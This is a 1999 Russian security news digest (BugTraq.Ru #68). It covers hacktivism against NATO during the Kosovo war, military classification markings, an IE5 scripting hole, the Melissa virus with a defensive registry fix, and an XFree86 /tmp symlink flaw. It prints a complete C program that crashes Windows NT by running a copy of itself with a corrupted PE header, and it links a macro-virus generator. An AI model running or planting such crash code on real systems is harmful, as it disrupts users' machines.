BugTraq.Ru: #68

30 марта 1999, #68

Похоже, что проблемы с distributed.net близятся к концу, обещается скорое восстановление кода для присоединения к командам... Тем временем по адресу 193.233.5.230 (порт 2064) начал откликаться практически официальныый прокси-сервер HackZone team, через который мы призываем работать всех желающих подключиться к команде и тех, у кого какие-то проблемы со связью с сервером distributed.net - канал на Россию там вроде бы нормальный. Статистика работы - здесь.

Наши опросы на тему "атак на информационные структуры НАТО" в сочетании с информацией о взломанных "в знак протеста" сайтах получили неожиданно громкий отклик - от публикации в Gazeta.Ru (вместе с комментарием от начальника отдела по борьбе с компьютерными преступлениями МВД России и предположением о взломе сервера Белого Дома) до упоминания в новостной ленте Interfax'а со всеми вытекающими последствиями в виде искаженных трактовок традиционными СМИ.

Совершенно не претендуя на роль главного организатора информационной войны против натовских супостатов, хотелось бы сделать некоторые замечания по поводу (хотя мне совершенно не хочется вступать в дискуссию, участники которой оперируют аргументами типа "а ваши сербы занимаются геноцидом беззащитных албанцев" и "пора поставить на место этих америкосов", совсем уйти от политики при обсуждении этой темы не удастся).

Мне вполне понятно желание пользователей российской сети принять участие в акциях протеста против происходящего в Сербии. Кстати, даже в самой радикальной форме они имеют более цивилизованный вид, чем митинг возле американского посольства (после его посещения в минувшее воскресенье у меня создалось стойкое впечатление, что больше всего от этого пострадали жители домов на противоположной стороне. Незабываемая сцена - когда в ответ на наивный вопрос одного из его участников "А где тут туалет?" дежурившие во дворе ребята в милицейской форме радостно показали на ближайшую стенку, у которой уже пристроилась очередная группа страждущих). Думаю, что участникам этих акций будет интересно узнать, что ко мне приходит большое количество писем, благодарящих за поддержку (например, от создателей http://www.yu/, целиком посвященного этому кризису). Впрочем, пишут не только в поддержку.

С другой стороны, подобные атаки могут оказаться изумительным подарком американским спецслужбам, вышибающим очередные деньги на разработку средств защиты от злобных русских хакеров и прочих средств информационной войны. Эта дойная корова будет пожирнее поднадоевшей проблемы y2k.

Есть сведения и другого рода. Скажем, некоторые российские сайты, размещенные за рубежом, уже стали испытывать проблемы с хостингом. Werwolf сообщает, что по словам представителей Land.ru, сайт с гостевыми книгами, на котором размещена одна из конференций RC5 HackZone team, уже несколько дней атакуется хакерами, и они связывают этот факт со своим участием в проекте Net Supports Yugoslavia (кстати, вот вам еще один более мирный способ поддержки). Так что предсказать все последствия разворачивающейся информационной войны я не берусь.

Сегодняшний МК решил подключиться к хакерской теме, разродившись следующим материалом (спасибо Науму, приславшему подробную цитату):

ХАКЕРЫ ОТКРЫВАЮТ ВТОРОЙ ФРОНТ
Атаку на страны НАТО предприняли российские хакеры. Используя собственные разработки, они проникли в системы компьютерного управления Пентагона и Центра спутниковой ориентации крылатых ракет "Томагавк".
Баранов Алексей
Как сообщили "МК" участники неформального объединения российских хакеров, за истекшие три дня было предпринято более 40 попыток атак на компьютерные центры Белого дома, Министерства обороны и компьютерной связи США. По заявлениям российских хакеров, более двух третей попыток забросить вирус или причинить какие-либо повреждения заокеанской системе увенчались успехом.
Специалисты, занятые в космической отрасли, к которым мы обратились за комментариями, подтвердили правдоподобность этой информации. По их оценкам, действия хакеров, направленные на дестабилизацию системы GPS, могут повлечь за собой весьма серьезные трудности, связанные с компьютерной навигацией морских судов и самолетов. Но в то же время предпринимаемые хакерами действия способны практически полностью "выключить" американскую систему наведения ракет и бомб на цель.
Таким образом, к торжеству отечественной техники, продемонстрированному удачным пуском ЗРК "Бук", вернувшим на грешную землю американский "Ночной ястреб", могут присоединиться российские фанаты компьютерного дела. Именно их усилиями ныне создаются помехи для натовских бомбардировок. И что самое интересное, ни по каким международным законам их нельзя привлечь к ответственности.

Какие специалисты могли в подтверждение правдоподобности информации о засылке вирусов начать рассказывать о дестабилизации системы GPS, я представляю очень слабо, равно как и при чем тут космическая отрасль. Об ответственности за эти дела см. вышеупомянутый комментарий. В общем, мороз крепчал, пурга свистела. Хотя... если я окажусь неправ, то не обижусь.

Откровенно говоря, я не слишком верю в то, что через Internet можно добраться до какой-то сверхсекретной информации. На случай, если вы все-таки добрались до документов, прошедших через военное ведомство США, приводим краткую памятку, которая поможет оценить важность обнаруженных документов - just in case (информацией поделился Евгений Ильченко).

По приоритетности такие документы подразделяются на следующие пять категорий:

Emergency (Y). Может быть задана только ну очень большими шишками.
Flash (Z). Зарезервирована для сообщений о контакте с противником или оперативных боевых сообщений особой срочности, типа сообщений о том, что населенный пункт, который вот-вот разбомбит доблестная авиация, вдруг оказался занят дружественными войсками, важных разведданных и т.п.
Immediate (O). Сведения о контратаках противники, запросы подкреплений, сведения о массовых беспорядках и т.п.
Priority (P). Выдвижение сил, согласование взаимодействия воздушных и сухопутных/морских сил.
Routine (R). Прочая рутина.

Также установлены следующие уровни секретности:

UNCLAS (U) - документы общего назначения.
UNCLAS FOUO (For Official Use Only) - наше ДСП.
UNCLAS E F T O (Encrypt for Transmission Only).
C O N F I D E N T I A L (С)
S E C R E T (S)
и, наконец, T O P S E C R E T (TS)

Для каждого документа могут быть установлены дополнительные категории (SPECAT), например
C O N F I D E N T I A L SPECAT EXCLUSIVE FOR
GEN DUKE FROM ADM DUVALLE
а также вспомогательные обозначения типа COSMIC (специфическое внутринатовское обозначение, аналогичное TOP SECRET), EYES ONLY, US-UK EYES ONLY, PERSONAL FOR и т.п.

В общем, ежели вам повстречался TOP SECRET-документ с пометкой Emergency... как там у нас называется высшая государственная награда?

Однако, хватит на сегодня о политике. В конце концов, неделя была богата и более традиционными для обзора событиями.

Сайт, который ведет упомянутый несколькими страницами выше Евгений Ильченко, обрел новое название - "Библиотека сетевой безопасности", новый адрес и новый, весьма стильный, хоть и слегка мрачноватый дизайн. На днях Женя решил приобщиться к обозревательской деятельности и завел рубрику НЕ обзор сайтов, заранее обезопасив себя от упреков в непериодичности :) (впрочем, с ними к нему все равно не подъехать, регулярность обновления остальных частей сайта достойна всяческих похвал). Зато эти самые упреки щедро раздаются другим безопасностным сайтам, чему, собственно, и посвящен первый выпуск НЕ обзора. С критикой в свой адрес могу согласиться лишь частично, за год с лишним, что выходит обзор, было всего два пропуска, один из которых пришелся на летний отпуск, второй - на зимнюю работу. А задержки с выходом действительно стали регулярными, тут мне возразить нечего. Надеюсь компенсировать объемом. Хотя порой смотришь на обзор, который даже самому немного нравится, понимаешь, что на этой неделе придется сменить его чем-то уровнем пониже, и так этого не хочется делать...

Но вовсе не все так плохо в нашем безопасностном интернете (а ничего прилагательное получилось, а?). Сайт Russian Security также буквально на днях обновил дизайн, сделав его довольно симпатичным, готовятся и другие изменения. А пока предлагаю устроить опрос среди посетителей, какие эмоции у них вызывает фотография на главной странице, и кто, по их мнению, на ней изображен :)

Черт, все вдруг начали менять дизайн. Может, и нам, того? Точно знаю, что структуру сайта пора перетрясти, поскольку старая уже давно трещит по швам, да и перерисовать бы его не мешало. Но лень-матушка...

Закрытая Всероссийская Конференция по вопросам информационной безопасности состоится в Уфе в июле 1999 года. Целью конференции является налаживание контактов между ведущими российскими специалистами в области информационной безопасности. Станет ли она российским CCC? Посмотрим.

По поводу моего вопроса о plea agreement. Пришло несколько разъяснений, ни одно, из которых, к сожалению, не сводится к краткому русскому аналогу. Если свести все воедино, получается нечто следующее: в общем случае это означает "соглашение сторон на основании формального прошения". Основанием для такого прошения могут быть: давление общественного мнения, дача показаний на более важных для правосудия лиц, ситуация, когда обвиняемый соглашается на признание себя виновным по менее серьезному обвинению в обмен на снятие более серьезных.

Спасибо за присланные варианты Илье Богушу, Петру Кирсанову, Александру Круглову.

Cuartango опять на посту. На сей раз демонстрируется использование "DHTML Edit control Safe for Scripting for IE 5" для обнародования содержимого clipboard и заполнения форм в соседнем фрейме (в последнем случае правда форма должна включать этот самый управляющий элемент). Вариация на тему - страница, традиционно позволяющая получить доступ к содержимому локального файла на диске. Что любопытно, сам IE5 имеет все необходимое для борьбы с этой дыркой - достаточно обратить внимание на параметр "Allow paste operations via script" в Security Settings. Однако по умолчанию это разрешено, что никак нельзя назвать хорошим решением.

Я уже окончательно перестал удивляться сообщениям о способах полюбоваться на синий экран смерти в NT. Так, следующая программка при запуске копирует саму себя во временный файл, немного подправляет его заголовок и запускает. И все дела.

#define WIN32_LEAN_AND_MEAN
#define STRICT
#include 
void main( void )
{
    char me[MAX_PATH], tpath[MAX_PATH], tname[MAX_PATH];
    HANDLE h;
    DWORD x, foo;
    STARTUPINFO sui;
    PROCESS_INFORMATION pi;

    if( MessageBox( NULL, "Do you want to crash your NT?", "Crash it?",
        MB_ICONQUESTION | MB_YESNOCANCEL ) != IDYES )
    {
        return;
    }

    GetModuleFileName( NULL, me, 256 );
    GetTempPath( 256, tpath );
    GetTempFileName( tpath, "foo", 0, tname );

    CopyFile( me, tname, FALSE );
    h = CreateFile( tname, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, 0, NULL );
    SetFilePointer( h, 0x3c, NULL, FILE_BEGIN );
    ReadFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    SetFilePointer( h, x + 0xc8, NULL, FILE_BEGIN );
    x = 0xba6defdd;
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    CloseHandle( h );

    GetStartupInfo( &sui );
    CreateProcess( NULL, tname, NULL, NULL, FALSE, 0, NULL,
        NULL, &sui, &pi );
}

Как вы уже, наверное, знаете, по миру стал расползаться очередной макро-вирус для Word'а Melissa. Большая скорость распространения вызвана тем, что при первом открытии зараженного документа он рассылает себя по первым 50 адресам из базы Outlook'а. В качестве подручного средства предохранения можно использовать reg-файл следующего содержания (вирус перед заражением проверяет наличие в реестре строчки "Melissa?"="... by Kwyjibo").

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"Melissa?"="... by Kwyjibo"

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word]

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options]
"EnableMacroVirusProtection"="1"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0]

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000002

Впрочем никто не обещает, что новые модификации вируса будет так же легко обмануть. По традиции, он уже отлавливается ведущими антивирусами, включая AVP. Появился и его аналог для Excel, под названием Papa, заражающий 60 первых адресов и не снисходящий до проверок количества запусков. Согласно последним сообщениям, есть шанс, что автора Мелиссы удастся вычислить с помощью того самого пользовательского идентификатора, встроенного в документ, о котором недавно было столько шума.

Ну а здесь можно взглянуть на инструмент для создания полиморфных макро-вирусов и результат его приложения к Мелиссе - Polissa.

А по Linux'ам тем временем ползет свой червь, использующий дырку в bind'е. За напоминание спасибо Алексу Поволоцкому

Серьезные проблемы с безопасностью имеют системы, поставляемые вместе с XFree86 3.3.3 (SuSE Linux, RedHat и т.п.). XFree86 создает подкаталог .X11-unix в каталоге /tmp с правами доступа 1777. Создав символическую ссылку с этим именем, указывающую на любой другой каталог, мы получим такие же права и там.

Ну а желающим достойно встретить всенародный праздник 1 апреля - пара ссылок на "Коллекцию прикольных программ" Сидора и обзор аналогичных программ в последнем Дисководе Газеты.Ру.

У вас есть новость или ссылка, заслуживающие внимания наших читателей ? Пишите.

« »